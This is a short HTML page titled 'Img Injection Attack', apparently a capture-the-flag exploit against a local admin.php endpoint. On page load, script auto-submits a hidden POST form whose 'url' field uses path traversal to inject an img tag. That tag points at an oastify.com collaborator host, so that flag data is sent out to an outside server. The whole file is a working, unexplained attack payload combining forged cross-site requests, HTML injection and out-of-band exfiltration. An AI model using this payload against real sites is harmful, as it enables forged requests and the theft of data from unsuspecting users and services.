  <!DOCTYPE html>
  <html>
  <head>
      <title>Img Injection Attack</title>
  </head>
  <body>
      <form id="attackForm" method="POST" action="http://localhost:5000/admin.php" target="hiddenFrame">
          <input type="hidden" name="url" value="http://localhost:5000/admin.php/../index.php?html=<img src='https://zgjhdwjylliddautpr6a8kr9w02rqie7.oastify.com/injected-flag-data/FLAG_HERE'>- {amount: 1, currency: US, op: BUY}
  - {amount: 1, currency: FL, op: SELL}">
      </form>
      <iframe name="hiddenFrame" style="display:none"></iframe>

      <script>
          document.getElementById('attackForm').submit();
      </script>
  </body>
  </html>
